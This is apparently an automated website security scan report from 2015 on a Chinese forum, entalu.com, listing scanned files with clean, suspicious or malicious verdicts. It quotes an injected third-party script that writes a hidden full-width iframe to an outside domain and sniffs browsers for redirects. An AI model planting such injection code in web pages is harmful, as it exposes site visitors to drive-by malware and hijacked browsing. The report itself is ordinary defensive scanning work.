Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=entalu.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://entalu.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 14 Jan 2015 08:48:39 GMT Location: forum.php Server: Microsoft-IIS/6.0 Content-Type: text/html X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.17 | clean |
http://entalu.com/forum.php | 200 OK Content-Length: 23168 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: f9dqhco.entalu.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gbk" /> <title>Ò¹Àï¸É-ߣÌØÌØ-ߣÓÑÍø</title> <meta name="keywords" content="Ò¹Àï¸É-ߣÌØÌØ" /> <meta name="description" content="Ò¹Àï¸É-ߣÌØÌØ-ß£Ó ...[4769 bytes skipped]... | ||
http://entalu.com/static/js/common.js?hQw | 200 OK Content-Length: 63289 Content-Type: application/x-javascript | clean |
http://kvbjf.pw/bbs.js | 200 OK Content-Length: 1117 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: www.yuxiangwu.org document.writeln("<iframe scrolling='no' frameborder='0' marginheight='0' marginwidth='0' width='100%' height='2450' allowTransparency src=http://www.yuxiangwu.org/></iframe>");
function browserRedirect() { var sUserAgent = navigator.userAgent.toLowerCase(); var bIsIpad = sUserAgent.match(/ipad/i) == "ipad"; var bIsIphoneOs = sUserAgent.match(/iphone os/i) == "iphone os"; var bIsMidp = sUserAgent.match(/midp/i) == "midp"; var bIsUc7 = sUserAgent.match(/rv:1.2.3.4/i) == "rv:1.2.3.4"; ...[528 bytes skipped]... Decoded script: <iframe scrolling='no' frameborder='0' marginheight='0' marginwidth='0' width='100%' height='2450' allowTransparency src=http://www.yuxiangwu.org/></iframe> Malicious iFrame found. size: 100x2450 src: http://www.yuxiangwu.org/ This URL is marked by Google as suspicious <iframe scrolling='no' frameborder='0' marginheight='0' marginwidth='0' width='100%' height='2450' allowtransparency src=http://www.yuxiangwu.org/> | ||
http://entalu.com/static/js/forum.js?hQw | 200 OK Content-Length: 22720 Content-Type: application/x-javascript | clean |
http://entalu.com/static/js/logging.js?hQw | 200 OK Content-Length: 603 Content-Type: application/x-javascript | clean |
http://entalu.com/member.php?mod=register | 200 OK Content-Length: 9954 Content-Type: text/html | clean |
http://js.users.51.la/16946601.js | 200 OK Content-Length: 1980 Content-Type: application/x-javascript | clean |
http://entalu.com/home.php?mod=misc&ac=sendmail&rand=1421225332 | 200 OK Content-Length: 0 Content-Type: text/javascript | clean |
http://discuz.gtimg.cn/cloud/scripts/discuz_tips.js?v=1 | 200 OK Content-Length: 6173 Content-Type: application/x-javascript | clean |
http://entalu.com/./ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 14 Jan 2015 08:48:59 GMT Location: forum.php Server: Microsoft-IIS/6.0 Content-Type: text/html X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.17 | clean |
http://entalu.com/./forum.php | 200 OK Content-Length: 36200 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: f9dqhco.entalu.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gbk" /> <title>Ò¹Àï¸É-ߣÌØÌØ-ߣÓÑÍø</title> <meta name="keywords" content="Ò¹Àï¸É-ߣÌØÌØ" /> <meta name="description" content="Ò¹Àï¸É-ߣÌØÌØ-ß£Ó ...[4735 bytes skipped]... | ||
http://entalu.com/./static/js/common.js?hQw | 200 OK Content-Length: 63289 Content-Type: application/x-javascript | clean |
http://entalu.com/./static/js/forum.js?hQw | 200 OK Content-Length: 22720 Content-Type: application/x-javascript | clean |
http://entalu.com/./static/js/logging.js?hQw | 200 OK Content-Length: 603 Content-Type: application/x-javascript | clean |
http://entalu.com/./member.php?mod=register | 200 OK Content-Length: 7240 Content-Type: text/html | clean |
http://entalu.com/././ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 14 Jan 2015 08:49:13 GMT Location: forum.php Server: Microsoft-IIS/6.0 Content-Type: text/html X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.17 | clean |
http://entalu.com/././forum.php | 200 OK Content-Length: 39693 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: f9dqhco.entalu.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gbk" /> <title>Ò¹Àï¸É-ߣÌØÌØ-ߣÓÑÍø</title> <meta name="keywords" content="Ò¹Àï¸É-ߣÌØÌØ" /> <meta name="description" content="Ò¹Àï¸É-ߣÌØÌØ-ß£Ó ...[4453 bytes skipped]... |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: entalu.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 14 Jan 2015 08:48:39 GMT
Location: forum.php
Server: Microsoft-IIS/6.0
Content-Type: text/html
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: entalu.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 14 Jan 2015 08:48:39 GMT
Location: forum.php
Server: Microsoft-IIS/6.0
Content-Type: text/html
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: entalu.com
Referer: http://www.google.com/search?q=entalu.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: entalu.com
Referer: http://www.google.com/search?q=entalu.com
Result:
The result is similar to the first query. There are no suspicious redirects found.